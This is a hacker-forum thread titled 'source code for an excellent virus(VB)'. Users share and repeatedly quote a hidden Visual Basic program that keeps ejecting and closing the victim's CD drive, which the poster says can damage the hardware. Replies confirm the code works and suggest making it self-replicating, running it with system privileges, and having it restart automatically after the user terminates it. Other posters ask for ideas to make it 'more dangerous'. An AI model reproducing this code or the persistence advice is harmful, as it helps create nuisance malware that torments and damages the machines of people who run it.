source code for an excellent virus(VB)

Discussion about hacker.org's server
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Post by treborguile »

that is really not the way of the hacker. 8)
Image
  Image
Image
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Post by jack krauser »

treborguile wrote:that is really not the way of the hacker. 8)
you mean to broke his computer :twisted:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
<<D.A.>>
Posts: 647
Joined: Wed Aug 15, 2007 5:16 pm
Location: nowhere

Post by <<D.A.>> »

it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Post by jack krauser »

<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Post by treborguile »

jack krauser wrote:
<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:
hahahahaha 8)
Image
  Image
Image
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Post by jack krauser »

treborguile wrote:
jack krauser wrote:
<<D.A.>> wrote:it's ain't the way of a hacker... IT'S THE WAY OF A CRAZY PSYCHO!!!!!! :twisted: :twisted: :twisted: :twisted:
hehehe :twisted: :twisted: :twisted: :twisted: :twisted:
hahahahaha 8)
hey do you know any other good virus? not fake :wink:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
koolpop0
Posts: 259
Joined: Thu Sep 20, 2007 11:03 pm
Location: In the binary of this system
Contact:

.

Post by koolpop0 »

cdaudio don't work for me help?
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Re: .

Post by jack krauser »

koolpop0 wrote:cdaudio don't work for me help?
what do you mean it didn't work? :?
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
Necklord
Posts: 11
Joined: Sat Sep 22, 2007 8:30 am
Location: Behind HC Server ...
Contact:

Re: source code for an excellent virus(VB)

Post by Necklord »

treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
Hackers Center Forum
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Re: source code for an excellent virus(VB)

Post by jack krauser »

Necklord wrote:
treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
Necklord
Posts: 11
Joined: Sat Sep 22, 2007 8:30 am
Location: Behind HC Server ...
Contact:

Re: source code for an excellent virus(VB)

Post by Necklord »

jack krauser wrote:
Necklord wrote:
treborguile wrote:Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?
Use private lib (vb)
Hackers Center Forum
I've never been able to work out detailed plans of what the future was going to be like... I just said " I'm going to fight, Who knows where I'll get? "
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Re: source code for an excellent virus(VB)

Post by jack krauser »

Necklord wrote:
jack krauser wrote:
Necklord wrote: Oke, bro ... This code work 100%. But, if you use this code:
1. Computer'll be slower.
2. You cann't put another code, like code to make virus duplicate. Because, program'll focus to this code.

If you wan't make powerfull virus i've some tricks. Make virus like KSPoold (can login as system). And make it to start automaticly. So, if user terminate it, it'll start again. Then, put your code more free. Because, your virus'll save!! (You won't put the lock task manager code)
any other tricks?
Use private lib (vb)
what is private lib? :? :? it's a programme? :?
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Re: source code for an excellent virus(VB)

Post by treborguile »

jack krauser wrote:
Necklord wrote:
jack krauser wrote: any other tricks?
Use private lib (vb)
what is private lib? :? :? it's a programme? :?
hahaha upgrading it will be nice
post ur ideas guys to make this virus more dangerous...
Image
  Image
Image
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Re: source code for an excellent virus(VB)

Post by jack krauser »

treborguile wrote:
jack krauser wrote:
Necklord wrote: Use private lib (vb)
what is private lib? :? :? it's a programme? :?
hahaha upgrading it will be nice
post ur ideas guys to make this virus more dangerous...
more dangerous :shock: :twisted: :twisted: :twisted: :twisted:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Post by treborguile »

:lol: :lol: :lol: :lol: :lol: 8)
Image
  Image
Image
Post Reply